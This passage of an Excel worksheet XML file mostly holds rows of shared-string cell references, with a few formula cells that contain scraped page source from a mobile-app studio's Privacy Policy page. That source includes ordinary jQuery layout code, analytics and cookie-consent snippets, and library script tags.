      </c>
      <c r="B4959" t="s">
        <v>1773</v>
      </c>
    </row>
    <row r="4960" spans="1:2">
      <c r="A4960" t="s">
        <v>65</v>
      </c>
      <c r="B4960" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="4961" spans="1:2">
      <c r="A4961" t="s">
        <v>65</v>
      </c>
      <c r="B4961" t="s">
        <v>1775</v>
      </c>
    </row>
    <row r="4962" spans="1:2">
      <c r="A4962" t="s">
        <v>65</v>
      </c>
      <c r="B4962" t="s">
        <v>1776</v>
      </c>
    </row>
    <row r="4963" spans="1:2">
      <c r="A4963" t="s">
        <v>65</v>
      </c>
      <c r="B4963" t="s">
        <v>1777</v>
      </c>
    </row>
    <row r="4964" spans="1:2">
      <c r="A4964" t="s">
        <v>65</v>
      </c>
      <c r="B4964" t="s">
        <v>1778</v>
      </c>
    </row>
    <row r="4965" spans="1:2">
      <c r="A4965" t="s">
        <v>65</v>
      </c>
      <c r="B4965" t="s">
        <v>1779</v>
      </c>
    </row>
    <row r="4966" spans="1:2">
      <c r="A4966" t="s">
        <v>129</v>
      </c>
      <c r="B4966" t="s">
        <v>3386</v>
      </c>
    </row>
    <row r="4967" spans="1:2">
      <c r="A4967" t="s">
        <v>129</v>
      </c>
      <c r="B4967" t="s">
        <v>3387</v>
      </c>
    </row>
    <row r="4968" spans="1:2">
      <c r="A4968" t="s">
        <v>129</v>
      </c>
      <c r="B4968" t="s">
        <v>3388</v>
      </c>
    </row>
    <row r="4969" spans="1:2">
      <c r="A4969" t="s">
        <v>129</v>
      </c>
      <c r="B4969" t="s">
        <v>3389</v>
      </c>
    </row>
    <row r="4970" spans="1:2">
      <c r="A4970" t="s">
        <v>129</v>
      </c>
      <c r="B4970" t="s">
        <v>3390</v>
      </c>
    </row>
    <row r="4971" spans="1:2">
      <c r="A4971" t="s">
        <v>129</v>
      </c>
      <c r="B4971" t="s">
        <v>3391</v>
      </c>
    </row>
    <row r="4972" spans="1:2">
      <c r="A4972" t="s">
        <v>129</v>
      </c>
      <c r="B4972" t="s">
        <v>3392</v>
      </c>
    </row>
    <row r="4973" spans="1:2">
      <c r="A4973" t="s">
        <v>129</v>
      </c>
      <c r="B4973" t="s">
        <v>3393</v>
      </c>
    </row>
    <row r="4974" spans="1:2">
      <c r="A4974" t="s">
        <v>130</v>
      </c>
      <c r="B4974" t="s">
        <v>3394</v>
      </c>
    </row>
    <row r="4975" spans="1:2">
      <c r="A4975" t="s">
        <v>130</v>
      </c>
      <c r="B4975" t="s">
        <v>3395</v>
      </c>
    </row>
    <row r="4976" spans="1:2">
      <c r="A4976" t="s">
        <v>130</v>
      </c>
      <c r="B4976" t="s">
        <v>3396</v>
      </c>
    </row>
    <row r="4977" spans="1:2">
      <c r="A4977" t="s">
        <v>130</v>
      </c>
      <c r="B4977" t="s">
        <v>3397</v>
      </c>
    </row>
    <row r="4978" spans="1:2">
      <c r="A4978" t="s">
        <v>130</v>
      </c>
      <c r="B4978" t="s">
        <v>645</v>
      </c>
    </row>
    <row r="4979" spans="1:2">
      <c r="A4979" t="s">
        <v>130</v>
      </c>
      <c r="B4979" t="s">
        <v>722</v>
      </c>
    </row>
    <row r="4980" spans="1:2">
      <c r="A4980" t="s">
        <v>130</v>
      </c>
      <c r="B4980" t="s">
        <v>723</v>
      </c>
    </row>
    <row r="4981" spans="1:2">
      <c r="A4981" t="s">
        <v>130</v>
      </c>
      <c r="B4981" t="s">
        <v>724</v>
      </c>
    </row>
    <row r="4982" spans="1:2">
      <c r="A4982" t="s">
        <v>130</v>
      </c>
      <c r="B4982" t="s">
        <v>725</v>
      </c>
    </row>
    <row r="4983" spans="1:2">
      <c r="A4983" t="s">
        <v>130</v>
      </c>
      <c r="B4983" t="s">
        <v>726</v>
      </c>
    </row>
    <row r="4984" spans="1:2">
      <c r="A4984" t="s">
        <v>130</v>
      </c>
      <c r="B4984" t="s">
        <v>654</v>
      </c>
    </row>
    <row r="4985" spans="1:2">
      <c r="A4985" t="s">
        <v>130</v>
      </c>
      <c r="B4985" t="s">
        <v>655</v>
      </c>
    </row>
    <row r="4986" spans="1:2">
      <c r="A4986" t="s">
        <v>130</v>
      </c>
      <c r="B4986" t="s">
        <v>656</v>
      </c>
    </row>
    <row r="4987" spans="1:2">
      <c r="A4987" t="s">
        <v>130</v>
      </c>
      <c r="B4987" t="s">
        <v>727</v>
      </c>
    </row>
    <row r="4988" spans="1:2">
      <c r="A4988" t="s">
        <v>130</v>
      </c>
      <c r="B4988" t="s">
        <v>728</v>
      </c>
    </row>
    <row r="4989" spans="1:2">
      <c r="A4989" t="s">
        <v>130</v>
      </c>
      <c r="B4989" t="s">
        <v>729</v>
      </c>
    </row>
    <row r="4990" spans="1:2">
      <c r="A4990" t="s">
        <v>130</v>
      </c>
      <c r="B4990" t="s">
        <v>730</v>
      </c>
    </row>
    <row r="4991" spans="1:2">
      <c r="A4991" t="s">
        <v>130</v>
      </c>
      <c r="B4991" t="s">
        <v>731</v>
      </c>
    </row>
    <row r="4992" spans="1:2">
      <c r="A4992" t="s">
        <v>130</v>
      </c>
      <c r="B4992" t="s">
        <v>732</v>
      </c>
    </row>
    <row r="4993" spans="1:2">
      <c r="A4993" t="s">
        <v>130</v>
      </c>
      <c r="B4993" t="s">
        <v>733</v>
      </c>
    </row>
    <row r="4994" spans="1:2">
      <c r="A4994" t="s">
        <v>130</v>
      </c>
      <c r="B4994" t="s">
        <v>734</v>
      </c>
    </row>
    <row r="4995" spans="1:2">
      <c r="A4995" t="s">
        <v>130</v>
      </c>
      <c r="B4995" t="s">
        <v>735</v>
      </c>
    </row>
    <row r="4996" spans="1:2">
      <c r="A4996" t="s">
        <v>130</v>
      </c>
      <c r="B4996" t="s">
        <v>736</v>
      </c>
    </row>
    <row r="4997" spans="1:2">
      <c r="A4997" t="s">
        <v>130</v>
      </c>
      <c r="B4997" t="s">
        <v>3398</v>
      </c>
    </row>
    <row r="4998" spans="1:2">
      <c r="A4998" t="s">
        <v>130</v>
      </c>
      <c r="B4998" t="s">
        <v>3399</v>
      </c>
    </row>
    <row r="4999" spans="1:2">
      <c r="A4999" t="s">
        <v>130</v>
      </c>
      <c r="B4999" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5000" spans="1:2">
      <c r="A5000" t="s">
        <v>130</v>
      </c>
      <c r="B5000" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5001" spans="1:2">
      <c r="A5001" t="s">
        <v>130</v>
      </c>
      <c r="B5001" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5002" spans="1:2">
      <c r="A5002" t="s">
        <v>130</v>
      </c>
      <c r="B5002" t="s">
        <v>2099</v>
      </c>
    </row>
    <row r="5003" spans="1:2">
      <c r="A5003" t="s">
        <v>130</v>
      </c>
      <c r="B5003" t="s">
        <v>2100</v>
      </c>
    </row>
    <row r="5004" spans="1:2">
      <c r="A5004" t="s">
        <v>130</v>
      </c>
      <c r="B5004" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5005" spans="1:2">
      <c r="A5005" t="s">
        <v>130</v>
      </c>
      <c r="B5005" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5006" spans="1:2">
      <c r="A5006" t="s">
        <v>130</v>
      </c>
      <c r="B5006" t="s">
        <v>2101</v>
      </c>
    </row>
    <row r="5007" spans="1:2">
      <c r="A5007" t="s">
        <v>130</v>
      </c>
      <c r="B5007" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="5008" spans="1:2">
      <c r="A5008" t="s">
        <v>130</v>
      </c>
      <c r="B5008" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="5009" spans="1:2">
      <c r="A5009" t="s">
        <v>130</v>
      </c>
      <c r="B5009" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="5010" spans="1:2">
      <c r="A5010" t="s">
        <v>130</v>
      </c>
      <c r="B5010" t="s">
        <v>2103</v>
      </c>
    </row>
    <row r="5011" spans="1:2">
      <c r="A5011" t="s">
        <v>130</v>
      </c>
      <c r="B5011" t="s">
        <v>2104</v>
      </c>
    </row>
    <row r="5012" spans="1:2">
      <c r="A5012" t="s">
        <v>130</v>
      </c>
      <c r="B5012" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5013" spans="1:2">
      <c r="A5013" t="s">
        <v>130</v>
      </c>
      <c r="B5013" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5014" spans="1:2">
      <c r="A5014" t="s">
        <v>130</v>
      </c>
      <c r="B5014" t="s">
        <v>2105</v>
      </c>
    </row>
    <row r="5015" spans="1:2">
      <c r="A5015" t="s">
        <v>130</v>
      </c>
      <c r="B5015" t="s">
        <v>2106</v>
      </c>
    </row>
    <row r="5016" spans="1:2">
      <c r="A5016" t="s">
        <v>130</v>
      </c>
      <c r="B5016" t="s">
        <v>748</v>
      </c>
    </row>
    <row r="5017" spans="1:2">
      <c r="A5017" t="s">
        <v>130</v>
      </c>
      <c r="B5017" t="s">
        <v>749</v>
      </c>
    </row>
    <row r="5018" spans="1:2">
      <c r="A5018" t="s">
        <v>130</v>
      </c>
      <c r="B5018" t="s">
        <v>2107</v>
      </c>
    </row>
    <row r="5019" spans="1:2">
      <c r="A5019" t="s">
        <v>130</v>
      </c>
      <c r="B5019" t="s">
        <v>2108</v>
      </c>
    </row>
    <row r="5020" spans="1:2">
      <c r="A5020" t="s">
        <v>130</v>
      </c>
      <c r="B5020" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5021" spans="1:2">
      <c r="A5021" t="s">
        <v>130</v>
      </c>
      <c r="B5021" t="s">
        <v>757</v>
      </c>
    </row>
    <row r="5022" spans="1:2">
      <c r="A5022" t="s">
        <v>130</v>
      </c>
      <c r="B5022" t="s">
        <v>2109</v>
      </c>
    </row>
    <row r="5023" spans="1:2">
      <c r="A5023" t="s">
        <v>130</v>
      </c>
      <c r="B5023" t="s">
        <v>2110</v>
      </c>
    </row>
    <row r="5024" spans="1:2">
      <c r="A5024" t="s">
        <v>130</v>
      </c>
      <c r="B5024" t="s">
        <v>748</v>
      </c>
    </row>
    <row r="5025" spans="1:2">
      <c r="A5025" t="s">
        <v>130</v>
      </c>
      <c r="B5025" t="s">
        <v>749</v>
      </c>
    </row>
    <row r="5026" spans="1:2">
      <c r="A5026" t="s">
        <v>130</v>
      </c>
      <c r="B5026" t="s">
        <v>2111</v>
      </c>
    </row>
    <row r="5027" spans="1:2">
      <c r="A5027" t="s">
        <v>130</v>
      </c>
      <c r="B5027" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="5028" spans="1:2">
      <c r="A5028" t="s">
        <v>130</v>
      </c>
      <c r="B5028" t="s">
        <v>741</v>
      </c>
    </row>
    <row r="5029" spans="1:2">
      <c r="A5029" t="s">
        <v>130</v>
      </c>
      <c r="B5029" t="s">
        <v>2112</v>
      </c>
    </row>
    <row r="5030" spans="1:2">
      <c r="A5030" t="s">
        <v>130</v>
      </c>
      <c r="B5030" t="s">
        <v>3400</v>
      </c>
    </row>
    <row r="5031" spans="1:2">
      <c r="A5031" t="s">
        <v>130</v>
      </c>
      <c r="B5031" t="s">
        <v>3401</v>
      </c>
    </row>
    <row r="5032" spans="1:2">
      <c r="A5032" t="s">
        <v>130</v>
      </c>
      <c r="B5032" t="s">
        <v>3402</v>
      </c>
    </row>
    <row r="5033" spans="1:2">
      <c r="A5033" t="s">
        <v>130</v>
      </c>
      <c r="B5033" t="s">
        <v>3403</v>
      </c>
    </row>
    <row r="5034" spans="1:2">
      <c r="A5034" t="s">
        <v>130</v>
      </c>
      <c r="B5034" t="s">
        <v>3404</v>
      </c>
    </row>
    <row r="5035" spans="1:2">
      <c r="A5035" t="s">
        <v>130</v>
      </c>
      <c r="B5035" t="s">
        <v>3405</v>
      </c>
    </row>
    <row r="5036" spans="1:2">
      <c r="A5036" t="s">
        <v>130</v>
      </c>
      <c r="B5036" t="s">
        <v>3406</v>
      </c>
    </row>
    <row r="5037" spans="1:2">
      <c r="A5037" t="s">
        <v>4</v>
      </c>
      <c r="B5037" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="5038" spans="1:2">
      <c r="A5038" t="s">
        <v>4</v>
      </c>
      <c r="B5038" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="5039" spans="1:2">
      <c r="A5039" t="s">
        <v>4</v>
      </c>
      <c r="B5039" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="5040" spans="1:2">
      <c r="A5040" t="s">
        <v>4</v>
      </c>
      <c r="B5040" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="5041" spans="1:2">
      <c r="A5041" t="s">
        <v>4</v>
      </c>
      <c r="B5041" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="5042" spans="1:2">
      <c r="A5042" t="s">
        <v>4</v>
      </c>
      <c r="B5042" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="5043" spans="1:2">
      <c r="A5043" t="s">
        <v>4</v>
      </c>
      <c r="B5043" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="5044" spans="1:2">
      <c r="A5044" t="s">
        <v>4</v>
      </c>
      <c r="B5044" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="5045" spans="1:2">
      <c r="A5045" t="s">
        <v>4</v>
      </c>
      <c r="B5045" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="5046" spans="1:2">
      <c r="A5046" t="s">
        <v>4</v>
      </c>
      <c r="B5046" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="5047" spans="1:2">
      <c r="A5047" t="s">
        <v>4</v>
      </c>
      <c r="B5047" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="5048" spans="1:2">
      <c r="A5048" t="s">
        <v>4</v>
      </c>
      <c r="B5048" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="5049" spans="1:2">
      <c r="A5049" t="s">
        <v>131</v>
      </c>
      <c r="B5049" t="s">
        <v>3407</v>
      </c>
    </row>
    <row r="5050" spans="1:2">
      <c r="A5050" t="s">
        <v>131</v>
      </c>
      <c r="B5050" t="s">
        <v>3395</v>
      </c>
    </row>
    <row r="5051" spans="1:2">
      <c r="A5051" t="s">
        <v>131</v>
      </c>
      <c r="B5051" t="s">
        <v>3408</v>
      </c>
    </row>
    <row r="5052" spans="1:2">
      <c r="A5052" t="s">
        <v>131</v>
      </c>
      <c r="B5052" t="s">
        <v>1950</v>
      </c>
    </row>
    <row r="5053" spans="1:2">
      <c r="A5053" t="s">
        <v>131</v>
      </c>
      <c r="B5053" t="s">
        <v>1951</v>
      </c>
    </row>
    <row r="5054" spans="1:2">
      <c r="A5054" t="s">
        <v>131</v>
      </c>
      <c r="B5054" t="s">
        <v>1952</v>
      </c>
    </row>
    <row r="5055" spans="1:2">
      <c r="A5055" t="s">
        <v>131</v>
      </c>
      <c r="B5055" t="s">
        <v>1953</v>
      </c>
    </row>
    <row r="5056" spans="1:2">
      <c r="A5056" t="s">
        <v>131</v>
      </c>
      <c r="B5056" t="s">
        <v>1954</v>
      </c>
    </row>
    <row r="5057" spans="1:2">
      <c r="A5057" t="s">
        <v>131</v>
      </c>
      <c r="B5057" t="s">
        <v>1955</v>
      </c>
    </row>
    <row r="5058" spans="1:2">
      <c r="A5058" t="s">
        <v>131</v>
      </c>
      <c r="B5058" t="s">
        <v>1956</v>
      </c>
    </row>
    <row r="5059" spans="1:2">
      <c r="A5059" t="s">
        <v>131</v>
      </c>
      <c r="B5059" t="s">
        <v>1957</v>
      </c>
    </row>
    <row r="5060" spans="1:2">
      <c r="A5060" t="s">
        <v>131</v>
      </c>
      <c r="B5060" t="s">
        <v>1958</v>
      </c>
    </row>
    <row r="5061" spans="1:2">
      <c r="A5061" t="s">
        <v>131</v>
      </c>
      <c r="B5061" t="s">
        <v>663</v>
      </c>
    </row>
    <row r="5062" spans="1:2">
      <c r="A5062" t="s">
        <v>131</v>
      </c>
      <c r="B5062" t="s">
        <v>664</v>
      </c>
    </row>
    <row r="5063" spans="1:2">
      <c r="A5063" t="s">
        <v>131</v>
      </c>
      <c r="B5063" t="s">
        <v>665</v>
      </c>
    </row>
    <row r="5064" spans="1:2">
      <c r="A5064" t="s">
        <v>131</v>
      </c>
      <c r="B5064" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="5065" spans="1:2">
      <c r="A5065" t="s">
        <v>131</v>
      </c>
      <c r="B5065" t="s">
        <v>1959</v>
      </c>
    </row>
    <row r="5066" spans="1:2">
      <c r="A5066" t="s">
        <v>131</v>
      </c>
      <c r="B5066" t="s">
        <v>1960</v>
      </c>
    </row>
    <row r="5067" spans="1:2">
      <c r="A5067" t="s">
        <v>131</v>
      </c>
      <c r="B5067" t="s">
        <v>1961</v>
      </c>
    </row>
    <row r="5068" spans="1:2">
      <c r="A5068" t="s">
        <v>131</v>
      </c>
      <c r="B5068" t="s">
        <v>1962</v>
      </c>
    </row>
    <row r="5069" spans="1:2">
      <c r="A5069" t="s">
        <v>131</v>
      </c>
      <c r="B5069" t="s">
        <v>1963</v>
      </c>
    </row>
    <row r="5070" spans="1:2">
      <c r="A5070" t="s">
        <v>131</v>
      </c>
      <c r="B5070" t="s">
        <v>3409</v>
      </c>
    </row>
    <row r="5071" spans="1:2">
      <c r="A5071" t="s">
        <v>131</v>
      </c>
      <c r="B5071" t="s">
        <v>3410</v>
      </c>
    </row>
    <row r="5072" spans="1:2">
      <c r="A5072" t="s">
        <v>131</v>
      </c>
      <c r="B5072">
        <f> $(".info_for ul").width(); //Get the width of row
	var colNum = Math.floor(colWrap / 150); //Find how many columns of 200px can fit per row / then round it down to a whole number
	var colFixed = Math.floor((colWrap / cols) - 25); //Get the width of the row and divide it by the number of columns it can fit / then round it down to a whole number. This value will be the exact width of the re-adjusted column
	$(".info_for ul").css({ 'width' : colWrap}); //Set exact width of row in pixels instead of using % - Prevents cross-browser bugs that appear in certain view port resolutions.
	 $(".info_for ul li").css({ 'width' : colFixed}); //Set exact width of the re-adjusted column	
}	
//smartColumns();//Execute the function when page loads
$(document).ready(function () { //Each time the viewport is adjusted/resized, execute the function
	smartColumns();
});
&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="5073" spans="1:2">
      <c r="A5073" t="s">
        <v>131</v>
      </c>
      <c r="B5073" t="s">
        <v>3411</v>
      </c>
    </row>
    <row r="5074" spans="1:2">
      <c r="A5074" t="s">
        <v>131</v>
      </c>
      <c r="B5074" t="s">
        <v>3412</v>
      </c>
    </row>
    <row r="5075" spans="1:2">
      <c r="A5075" t="s">
        <v>131</v>
      </c>
      <c r="B5075" t="s">
        <v>3413</v>
      </c>
    </row>
    <row r="5076" spans="1:2">
      <c r="A5076" t="s">
        <v>131</v>
      </c>
      <c r="B5076" t="s">
        <v>3414</v>
      </c>
    </row>
    <row r="5077" spans="1:2">
      <c r="A5077" t="s">
        <v>131</v>
      </c>
      <c r="B5077" t="s">
        <v>3415</v>
      </c>
    </row>
    <row r="5078" spans="1:2">
      <c r="A5078" t="s">
        <v>131</v>
      </c>
      <c r="B5078" t="s">
        <v>3416</v>
      </c>
    </row>
    <row r="5079" spans="1:2">
      <c r="A5079" t="s">
        <v>131</v>
      </c>
      <c r="B5079" t="s">
        <v>3417</v>
      </c>
    </row>
    <row r="5080" spans="1:2">
      <c r="A5080" t="s">
        <v>131</v>
      </c>
      <c r="B5080" t="s">
        <v>3418</v>
      </c>
    </row>
    <row r="5081" spans="1:2">
      <c r="A5081" t="s">
        <v>131</v>
      </c>
      <c r="B5081" t="s">
        <v>3419</v>
      </c>
    </row>
    <row r="5082" spans="1:2">
      <c r="A5082" t="s">
        <v>131</v>
      </c>
      <c r="B5082" t="s">
        <v>3420</v>
      </c>
    </row>
    <row r="5083" spans="1:2">
      <c r="A5083" t="s">
        <v>131</v>
      </c>
      <c r="B5083" t="s">
        <v>3421</v>
      </c>
    </row>
    <row r="5084" spans="1:2">
      <c r="A5084" t="s">
        <v>131</v>
      </c>
      <c r="B5084" t="s">
        <v>3422</v>
      </c>
    </row>
    <row r="5085" spans="1:2">
      <c r="A5085" t="s">
        <v>131</v>
      </c>
      <c r="B5085" t="s">
        <v>3423</v>
      </c>
    </row>
    <row r="5086" spans="1:2">
      <c r="A5086" t="s">
        <v>4</v>
      </c>
      <c r="B5086" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="5087" spans="1:2">
      <c r="A5087" t="s">
        <v>4</v>
      </c>
      <c r="B5087" t="s">
        <v>305</v>
      </c>
    </row>
    <row r="5088" spans="1:2">
      <c r="A5088" t="s">
        <v>4</v>
      </c>
      <c r="B5088" t="s">
        <v>306</v>
      </c>
    </row>
    <row r="5089" spans="1:2">
      <c r="A5089" t="s">
        <v>4</v>
      </c>
      <c r="B5089" t="s">
        <v>307</v>
      </c>
    </row>
    <row r="5090" spans="1:2">
      <c r="A5090" t="s">
        <v>4</v>
      </c>
      <c r="B5090" t="s">
        <v>308</v>
      </c>
    </row>
    <row r="5091" spans="1:2">
      <c r="A5091" t="s">
        <v>4</v>
      </c>
      <c r="B5091" t="s">
        <v>309</v>
      </c>
    </row>
    <row r="5092" spans="1:2">
      <c r="A5092" t="s">
        <v>4</v>
      </c>
      <c r="B5092" t="s">
        <v>310</v>
      </c>
    </row>
    <row r="5093" spans="1:2">
      <c r="A5093" t="s">
        <v>4</v>
      </c>
      <c r="B5093" t="s">
        <v>311</v>
      </c>
    </row>
    <row r="5094" spans="1:2">
      <c r="A5094" t="s">
        <v>4</v>
      </c>
      <c r="B5094" t="s">
        <v>312</v>
      </c>
    </row>
    <row r="5095" spans="1:2">
      <c r="A5095" t="s">
        <v>4</v>
      </c>
      <c r="B5095" t="s">
        <v>313</v>
      </c>
    </row>
    <row r="5096" spans="1:2">
      <c r="A5096" t="s">
        <v>4</v>
      </c>
      <c r="B5096" t="s">
        <v>314</v>
      </c>
    </row>
    <row r="5097" spans="1:2">
      <c r="A5097" t="s">
        <v>4</v>
      </c>
      <c r="B5097" t="s">
        <v>315</v>
      </c>
    </row>
    <row r="5098" spans="1:2">
      <c r="A5098" t="s">
        <v>5</v>
      </c>
      <c r="B5098" t="s">
        <v>316</v>
      </c>
    </row>
    <row r="5099" spans="1:2">
      <c r="A5099" t="s">
        <v>5</v>
      </c>
      <c r="B5099" t="s">
        <v>317</v>
      </c>
    </row>
    <row r="5100" spans="1:2">
      <c r="A5100" t="s">
        <v>5</v>
      </c>
      <c r="B5100" t="s">
        <v>318</v>
      </c>
    </row>
    <row r="5101" spans="1:2">
      <c r="A5101" t="s">
        <v>5</v>
      </c>
      <c r="B5101" t="s">
        <v>319</v>
      </c>
    </row>
    <row r="5102" spans="1:2">
      <c r="A5102" t="s">
        <v>5</v>
      </c>
      <c r="B5102" t="s">
        <v>320</v>
      </c>
    </row>
    <row r="5103" spans="1:2">
      <c r="A5103" t="s">
        <v>5</v>
      </c>
      <c r="B5103" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="5104" spans="1:2">
      <c r="A5104" t="s">
        <v>5</v>
      </c>
      <c r="B5104" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="5105" spans="1:2">
      <c r="A5105" t="s">
        <v>5</v>
      </c>
      <c r="B5105">
        <f> window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-84213520-6');
&lt;/script&gt; --&gt;
&lt;script&gt;
    window.addEventListener("load", function(){
        window.cookieconsent.initialise({
            "palette": {
                "popup": {
                    "background": "#000"
                },
                "button": {
                    "background": "#f1d600"
                }
            },
            "position": "bottom-left"
        })});
&lt;/script&gt;
&lt;!-- All JS --&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-1.11.0.min.js"&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/jquery-migrate-1.2.1.min.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/greensock.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/jquery.easing.1.3.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.transitions.js" defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/layerslider/layerslider.kreaturamedia.jquery.js " defer&gt;&lt;/script&gt;
&lt;script src="https://gunjanappstudios.com/public/frontend/js/cookieconsent.min.js"&gt;&lt;/script&gt;
&lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="5106" spans="1:2">
      <c r="A5106" t="s">
        <v>5</v>
      </c>
      <c r="B5106" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="5107" spans="1:2">
      <c r="A5107" t="s">
        <v>5</v>
      </c>
      <c r="B5107" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="5108" spans="1:2">
      <c r="A5108" t="s">
        <v>5</v>
      </c>
      <c r="B5108" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="5109" spans="1:2">
      <c r="A5109" t="s">
        <v>5</v>
      </c>
      <c r="B5109" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="5110" spans="1:2">
      <c r="A5110" t="s">
        <v>5</v>
      </c>
      <c r="B5110" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="5111" spans="1:2">
      <c r="A5111" t="s">
        <v>5</v>
      </c>
      <c r="B5111" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="5112" spans="1:2">
      <c r="A5112" t="s">
        <v>5</v>
      </c>
      <c r="B5112" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="5113" spans="1:2">
      <c r="A5113" t="s">
        <v>5</v>
      </c>
      <c r="B5113" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="5114" spans="1:2">
      <c r="A5114" t="s">
        <v>5</v>
      </c>
      <c r="B5114" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="5115" spans="1:2">
      <c r="A5115" t="s">
        <v>5</v>
      </c>
      <c r="B5115" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="5116" spans="1:2">
      <c r="A5116" t="s">
        <v>5</v>
      </c>
      <c r="B5116">
        <f> $(window).scrollTop();
    if (scrollTop &gt; 249) {
        // $('.header').addClass('fadeOutLeft');
        // $('.header').removeClass('fadeInLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeOutUp');
        $('.header-sticky').addClass('animated');      
    } else {
        // $('.header').addClass('fadeInLeft');
        // $('.header').removeClass('fadeOutLeft');
        $('.header-sticky').addClass('fadeInDown');
        $('.header-sticky').removeClass('fadeInDown');
    }
  });
});
&lt;/script&gt;
&lt;style type="text/css"&gt;
.header-sticky.fadeInDown {
    position: fixed;
    width: 100%;
    opacity: 0;
    z-index: 999;
}
&lt;/style&gt;
    &lt;div class="page-banner" style="background-image: url(https://gunjanappstudios.com/public/uploads/banner_privacy.png)"&gt;
        &lt;div class="bg-page"&gt;&lt;/div&gt;
        &lt;div class="text"&gt;
            &lt;h1&gt;Privacy Policy&lt;/h1&gt;
            &lt;nav aria-label="breadcrumb"&gt;
                &lt;ol class="breadcrumb justify-content-center"&gt;
                    &lt;li class="breadcrumb-item"&gt;&lt;a href="https://gunjanappstudios.com"&gt;Home&lt;/a&gt;&lt;/li&gt;
                    &lt;li class="breadcrumb-item active" aria-current="page"&gt;Privacy Policy&lt;/li&gt;
                &lt;/ol&gt;
            &lt;/nav&gt;
        &lt;/div&gt;
        &lt;div id="privacy-policy"&gt;&lt;/div&gt;
    &lt;/div&gt;
    &lt;!--mobile banner--&gt;
    &lt;div class="mobile-banner"&gt;
        &lt;img src="https://gunjanappstudios.com/public/uploads/banner_privacy_mobile.png"&gt;
    &lt;/div&gt;
    &lt;div class="page-content"&gt;
        &lt;div class="container"&gt;
            &lt;div class="heading"&gt;
                &lt;h2 class="heding_s"&gt;Privacy Policy&lt;/h2&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-md-12"&gt;
                    &lt;p&gt;_x000D_
                        &lt;b&gt;Privacy Policy&lt;/b&gt;_x000D_
                        &lt;br&gt;_x000D_
                    &lt;/p&gt;_x000D_
                    &lt;p&gt;We respect and value your privacy here at GunjanApps Studios.&lt;/p&gt;_x000D_
                    &lt;p&gt;Our Privacy Policy describes the information collected by our company GunjanApps Studios, and our partners, through our mobile applications and the use of the information.&lt;/p&gt;_x000D_
                    &lt;p&gt;</f>
        <v>0</v>
      </c>
    </row>
    <row r="5117" spans="1:2">
      <c r="A5117" t="s">
        <v>5</v>
      </c>
      <c r="B5117" t="s">
        <v>333</v>
      </c>
    </row>
    <row r="5118" spans="1:2">
      <c r="A5118" t="s">
        <v>5</v>
      </c>
      <c r="B5118" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="5119" spans="1:2">
      <c r="A5119" t="s">
        <v>5</v>
      </c>
      <c r="B5119" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="5120" spans="1:2">
      <c r="A5120" t="s">
        <v>5</v>
      </c>
      <c r="B5120" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="5121" spans="1:2">
      <c r="A5121" t="s">
        <v>5</v>
      </c>
      <c r="B5121" t="s">
        <v>337</v>
      </c>
    </row>
    <row r="5122" spans="1:2">
      <c r="A5122" t="s">
        <v>5</v>
      </c>
      <c r="B5122" t="s">
        <v>338</v>
      </c>
    </row>
    <row r="5123" spans="1:2">
      <c r="A5123" t="s">
        <v>5</v>
      </c>
      <c r="B5123" t="s">
        <v>339</v>
      </c>
    </row>
    <row r="5124" spans="1:2">
      <c r="A5124" t="s">
        <v>5</v>
      </c>
      <c r="B5124" t="s">
        <v>340</v>
      </c>
    </row>
    <row r="5125" spans="1:2">
      <c r="A5125" t="s">
        <v>5</v>
      </c>
      <c r="B5125" t="s">
        <v>341</v>
      </c>
